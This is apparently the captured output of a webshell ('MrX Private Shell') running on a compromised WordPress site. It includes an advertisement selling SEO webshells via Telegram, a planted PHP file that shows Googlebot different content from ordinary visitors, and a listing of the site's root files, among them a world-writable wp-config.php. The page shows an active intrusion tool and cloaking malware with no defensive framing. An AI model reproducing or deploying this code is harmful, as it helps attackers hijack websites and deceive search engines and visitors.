__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
$googleBots = array(
"Googlebot",
"Google-Site-Verification",
"Google-InspectionTool",
"Googlebot-Mobile",
"Googlebot-News"
);
$isGoogleBot = false;
if (isset($_SERVER['HTTP_USER_AGENT'])) {
foreach ($googleBots as $bot) {
if (stripos($_SERVER['HTTP_USER_AGENT'], $bot) !== false) {
$isGoogleBot = true;
break;
}
}
}
if ($isGoogleBot) {
$bot_content = file_get_contents('page.php');
echo $bot_content;
exit;
} else {
include('home.php');
exit;
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| wp-admin | Folder | 0775 |
|
|
| wp-content | Folder | 0775 |
|
|
| wp-includes | Folder | 0775 |
|
|
| .htaccess | File | 566 B | 0644 |
|
| home.php | File | 405 B | 0664 |
|
| index.php | File | 543 B | 0644 |
|
| license.txt | File | 19.44 KB | 0664 |
|
| readme.html | File | 7.25 KB | 0664 |
|
| wp-activate.php | File | 7.18 KB | 0664 |
|
| wp-blog-header.php | File | 351 B | 0664 |
|
| wp-comments-post.php | File | 2.27 KB | 0664 |
|
| wp-config-sample.php | File | 3.26 KB | 0664 |
|
| wp-config.php | File | 3.53 KB | 0666 |
|
| wp-cron.php | File | 5.49 KB | 0664 |
|
| wp-links-opml.php | File | 2.43 KB | 0664 |
|
| wp-load.php | File | 3.84 KB | 0664 |
|
| wp-login.php | File | 50.23 KB | 0664 |
|
| wp-mail.php | File | 8.52 KB | 0664 |
|
| wp-settings.php | File | 30.33 KB | 0664 |
|
| wp-signup.php | File | 33.71 KB | 0664 |
|
| wp-trackback.php | File | 5.09 KB | 0664 |
|
| wp.php | File | 463 B | 0644 |
|
| xmlrpc.php | File | 0 B | 0664 |
|